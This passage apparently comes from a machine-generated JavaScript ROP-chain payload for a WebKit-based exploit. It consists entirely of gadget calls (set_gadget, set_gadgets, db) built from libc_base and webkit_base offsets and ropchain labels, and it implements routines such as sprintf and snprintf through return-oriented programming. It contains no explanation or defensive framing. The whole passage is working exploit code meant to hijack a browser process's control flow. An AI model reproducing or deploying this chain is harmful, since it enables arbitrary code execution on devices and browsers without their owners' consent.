al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12312: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12314: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+555808, //L12317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+555824, //L12318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+555776, //L12315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+555792, //L12316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12315: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12316: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12317: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12318: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+555904, //L12319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+555920, //L12320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12319: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12320: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+556032, //L12321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+556064, //L12323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+556048, //L12322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12321: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12322: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L12323: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+556168, //L12324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+556184, //L12325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12324: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12325: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+556304, //L12326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+556288, //L12327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12327: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12326: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+556392, //L12329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+556376, //L12328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12328: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12329: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+556496, //L12330 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+556512, //L12331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+568675 //pop r8 ]); //L12330: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12331: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+556632, //L12332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+556616, //L12333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12333: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12332: db([0, 0]); // 0x0 //_sprintf_: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+556704, //L12335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12335: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+556768, //L12337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12337: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+556856, //L12339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12338: db([24, 0]); // 0x18 set_gadget(libc_base+759608,); //pop rax //L12339: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+556912, //L12340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12340: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12342: db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12343: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12345: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+557088, //L12348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+557072, //L12346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12346: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12348: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+557232, //L12351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+557200, //L12349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+557216, //L12350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12349: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12350: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12351: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+557312, //L12352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12352: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12354: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+557432, //L12357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+557416, //L12355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12355: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12357: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+557576, //L12360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+557544, //L12358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+557560, //L12359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12358: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12359: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12360: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12361: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12362: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L12363: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+557848, //L12365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+557864, //L12366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+557832, //L12364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop 
r9 ]); //L12364: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12365: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12366: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+557960, //L12368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+557944, //L12367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12367: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12368: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+558040, //L12369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12369: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12371: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+558160, //L12374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+558144, //L12372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12372: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12374: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+558304, //L12377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+558272, //L12375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+558288, //L12376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12375: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi 
//L12376: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12377: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12378: ropchain+161664, //__out_buffer libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12380: ropchain+558456, //L12379 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+317712, //__vsnprintf //L12379: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+558528, //L12381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12381: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12383: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L12385: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+558688, //L12388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+558672, //L12386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12386: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12388: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+558864, //L12391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+558880, //L12392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+558832, //L12389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+558848, //L12390 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12389: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12390: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12391: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12392: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+558960, //L12393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+558976, //L12394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12393: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12394: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+559088, //L12395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+559120, //L12397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+559104, //L12396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12395: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12397: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+559224, //L12398 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+559240, //L12399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12398: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12399: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+559360, //L12400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+559344, //L12401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12401: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12400: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+559448, //L12403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+559432, //L12402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12403: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+559552, //L12404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+559568, //L12405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12405: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi 
ropchain+559688, //L12406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+559672, //L12407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12407: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12406: db([0, 0]); // 0x0 //_snprintf_: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+559760, //L12409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12409: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+559824, //L12411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12411: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+559912, //L12413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12412: db([32, 0]); // 0x20 set_gadget(libc_base+759608,); //pop rax //L12413: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+559968, //L12414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12414: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12416: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12417: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12419: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760, //pop rsi ropchain+560144, //L12422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+560128, //L12420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12420: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12422: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+560288, //L12425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+560256, //L12423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+560272, //L12424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12423: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12424: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12425: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+560368, //L12426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12426: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12428: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+560488, //L12431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+560472, //L12429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12429: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12431: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+560632, 
//L12434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+560600, //L12432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+560616, //L12433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12432: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12433: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12434: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+560712, //L12435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12435: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12437: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+560832, //L12440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+560816, //L12438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12438: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12440: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+560976, //L12443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+560944, //L12441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+560960, //L12442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12441: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12442: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax 
//L12443: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+561056, //L12444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12444: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12446: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+561176, //L12449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+561160, //L12447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12447: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12449: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+561320, //L12452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+561288, //L12450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+561304, //L12451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12450: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12451: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12452: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12453: ropchain+161664, //__out_buffer libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12455: ropchain+561472, //L12454 libc_base+764760 //pop rsi ]); 
db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+317712, //__vsnprintf //L12454: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+561544, //L12456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12456: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12458: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L12460: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+561704, //L12463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+561688, //L12461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12461: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12463: db([0, 0]); // 0x0 